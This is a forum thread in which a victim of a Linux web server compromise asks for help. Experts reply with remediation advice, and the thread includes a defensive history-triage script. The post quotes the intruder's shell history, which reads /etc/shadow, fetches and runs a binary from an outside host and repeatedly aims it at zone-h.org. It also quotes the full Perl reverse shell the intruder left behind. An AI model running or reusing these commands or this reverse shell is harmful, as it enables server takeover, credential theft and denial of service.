TSHAW

Linux: Possible root vulnerability, through url code injection

Hello, I've searched for my question and found something similar in ID 21727726. But I have an extra problem. The hacker didn't just copy the "back" file to the /tmp directory; I also found in /root/.bash_history the following set of commands, which I didn't enter in any terminal of my server:

ifconfig
ifconfig -all
ifconfig ?
ifconfig --help
man ifconfig
id
cd /etc
ls -la
cd yum
ls -la
cat /etc/shadow
wget http://ddmalfa.cz/_adm/dd
chmod 777 dd
./dd www.zone-h.org 53 127.0.0.66
./dd www.zone-h.org 53 127.0.0.66
./dd www.zone-h.org 53 127.0.0.66
./dd www.zone-h.org 53 127.0.0.66
./dd www.zone-h.org 53 127.0.0.66
./dd zone-h.org 80 127.0.0.128
./dd zone-h.org 80 127.0.0.128
./dd zone-h.org 80 127.0.0.128
./dd zone-h.org 80 127.0.0.128
./dd zone-h.org 80 127.0.0.128
./dd zone-h.org 80 127.0.0.128
./dd zone-h.org 80 127.0.0.128
./dd zone-h.org 80 127.0.0.128
./dd zone-h.org 80 127.0.0.128
./dd zone-h.org 80 127.0.0.128
./dd zone-h.org 80 127.0.0.128
./dd zone-h.org 80 127.0.0.128
./dd zone-h.org 80 127.0.0.128
./dd zone-h.org 80 127.0.0.128
./dd zone-h.org 80 127.0.0.128
./dd zone-h.org 80 127.0.0.128
./dd zone-h.org 80 127.0.0.128
./dd zone-h.org 80 127.0.0.128
./dd zone-h.org 80 127.0.0.128

Apparently the hacker accessed my server as root (since that is the only way he could possibly have run those commands in a superuser terminal) and ran that set of commands, including the download of the dd script; I'm sure he didn't get in by entering the correct password, because he didn't change it and I've already searched the logs for ssh failures. I'm attaching a screenshot of the dd script code. If you need it I can send it to you.

We first noticed the attack because our site became unreachable, and even through the FW we couldn't reach the servers. When I first accessed the server (physically) I just saw the "dd" process running at 100% CPU, so I killed it. After that the server returned to normal, and so did the FW.

So my questions:
1.- Did he really access my server as root?
2.- If so, what do I have to do to protect it?

Thank you in advance

"back" code:

#!/usr/bin/perl
# Reverse shell: connects out to the host/port given on the command line
# and attaches /bin/sh to that connection.
use Socket;
$cmd= "lynx";                                         # fake process name shown in ps
$system= 'echo "`uname -a`";echo "`id`";/bin/sh';     # prints kernel and uid, then drops to a shell
$0=$cmd;
$target=$ARGV[0];
$port=$ARGV[1];
$iaddr=inet_aton($target) || die("Error: $!\n");
$paddr=sockaddr_in($port, $iaddr) || die("Error: $!\n");
$proto=getprotobyname('tcp');
socket(SOCKET, PF_INET, SOCK_STREAM, $proto) || die("Error: $!\n");
connect(SOCKET, $paddr) || die("Error: $!\n");        # outbound connection, so it passes inbound-only filtering
open(STDIN, ">&SOCKET");                              # stdin/stdout/stderr are all duplicated onto the socket
open(STDOUT, ">&SOCKET");
open(STDERR, ">&SOCKET");
system($system);                                      # runs with whatever privileges the caller had
close(STDIN);
close(STDOUT);
close(STDERR);

Attachment: DDOS.doc
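As an added example (not part of the original thread), a small Python triage script for a history file like the one the asker posted: it flags the /etc/shadow read, the wget-then-chmod-then-run chain, and a downloaded binary launched repeatedly against one host and port. The sample history, URL and hostnames are constructed placeholders, not the real ones from the post.

```python
import re
from collections import Counter

# Constructed sample mirroring the shape of the history in the question;
# the URL and hostnames are placeholders, not the real ones.
SAMPLE_HISTORY = """\
id
cat /etc/shadow
wget http://example.invalid/_adm/dd
chmod 777 dd
./dd victim.example 53 127.0.0.66
./dd victim.example 80 127.0.0.128
./dd victim.example 80 127.0.0.128
./dd victim.example 80 127.0.0.128
"""

# "./tool [host port ...]" as seen in the posted history
RUN_RE = re.compile(r"^\./(\S+)(?:\s+(\S+)\s+(\d+))?")

def triage_history(text, repeat_threshold=3):
    """Return (line_no, finding) tuples; line_no 0 marks a whole-file pattern."""
    findings = []
    downloaded, made_exec, reported = set(), set(), set()
    runs = Counter()
    for n, cmd in enumerate((l.strip() for l in text.splitlines()), 1):
        argv = cmd.split()
        if not argv:
            continue
        if "/etc/shadow" in cmd:
            findings.append((n, "credential access: /etc/shadow read"))
        if argv[0] in ("wget", "curl"):
            downloaded.add(argv[-1].rsplit("/", 1)[-1])  # basename of the fetched URL
        elif argv[0] == "chmod" and len(argv) >= 3 and argv[2] in downloaded:
            made_exec.add(argv[2])
        m = RUN_RE.match(cmd)
        if m:
            name, host, port = m.groups()
            if name in made_exec and name not in reported:
                reported.add(name)
                findings.append((n, f"download-chmod-execute chain: ./{name}"))
            if host:
                runs[(name, host, port)] += 1
    for (name, host, port), count in runs.items():
        if count >= repeat_threshold:
            findings.append((0, f"{name} launched {count}x against {host}:{port} (flood tool?)"))
    return findings

if __name__ == "__main__":
    for line_no, what in triage_history(SAMPLE_HISTORY):
        print(f"line {line_no or '-'}: {what}")
```

Run it against /root/.bash_history (or any user's history) on a disk image taken before rebuilding; an empty result only means these particular patterns are absent, not that the box is clean.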
ahoffmann

Do you perhaps have vulnerable web applications on that server?
ASKER CERTIFIED SOLUTION
fosiul01

This solution is only available to members.
> 1. Reinstall your server.
FULL ACK
:)

> 8. use mod security to protect your apache
hmm, mod_security can protect your application, but it can protect apache only partially
remember that mod_security is a module inside apache
TSHAW

ASKER

1.- This server is a web server (web application)
2.- This server is behind a Juniper Netscreen firewall; all ports are protected, the only one open is 80, and it's redirected to the server through a VIP service
3.- The servers are not directly reachable via ssh, ftp or telnet from the internet. I have a VPN from my office to administer them, with local IP addresses.
4.- Apache is not running as root.

I think it is difficult to access the server directly considering the above. So maybe the hacker really accessed my server through some vulnerability in the web application, didn't he?
If your server (httpd process) is not running as root, and the default server (the part which is served as user root) is not accessible, then there are only 2 possibilities left:
  1. the web server (apache httpd here) itself has a vulnerability
  2. any of the applications uses/calls an external program which can get root access

Do you have any hints in your access_log or error_log?
From the scenario you describe, it looks like it was done via the web server...

What kind of website is your server hosting? Does any website need to play with the Linux file system or something like that?
What I meant is, does any website have the ability to modify the Linux file system for any kind of purpose, or anything?

Is your apache up to date? Is your Linux server up to date?

TSHAW

ASKER

ahoffmann:

1.- The apache child processes are running as nobody, but indeed the default server is running as root. So what do I have to do to be sure this default server (running as root) is not accessible?
2.- I've already looked at the access_log and error_log and I didn't see anything wrong.

fosiul01:

1.- My web site is an AVL (automatic vehicle location) application developed in PHP. As far as I can remember there isn't any part of the website that accesses the Linux file system. I do have some PHP scripts that run from the CLI, but those scripts are not accessible from the web (those PHP scripts do play with the Linux file system).
2.- We are updating apache and linux right now (to tell you the truth we hadn't updated them for a while).

note: We just decided to run apache on a higher port (1030), so the FW does the translation from 80 to 1030, and to use a user called "webserver" to run apache. What do you think?
Update both Apache and linux (but REinstall first). Don't update the same server. Reinstall totally, then install again.

Put a firewall in place. Install mod_security; nowadays most companies use mod_security as an apache-level firewall.

Also use the reverse proxy concept; it will protect your main server from 90% of hacks....

Also, since you have been hacked ONCE!! keep all your logs on a different server which can't be accessed from outside. If any incident happens you will know how it happened.

As I said, the first thing hackers do is delete all the offending logs from the compromised server.
I feel sorry for TSHAW, and this certainly seems to be a hard lesson.
Adding to the experts here:
If you are hacked once, you are going to be hacked again, so you have to be prepared. Before sending the server to production, do a vulnerability scan on it (you can use WebInspect or Nikto; there are lots out there).
Once that is done, along with the experts' suggestions, deploy. A syslog server would also help, so that your webserver can direct its logs to it.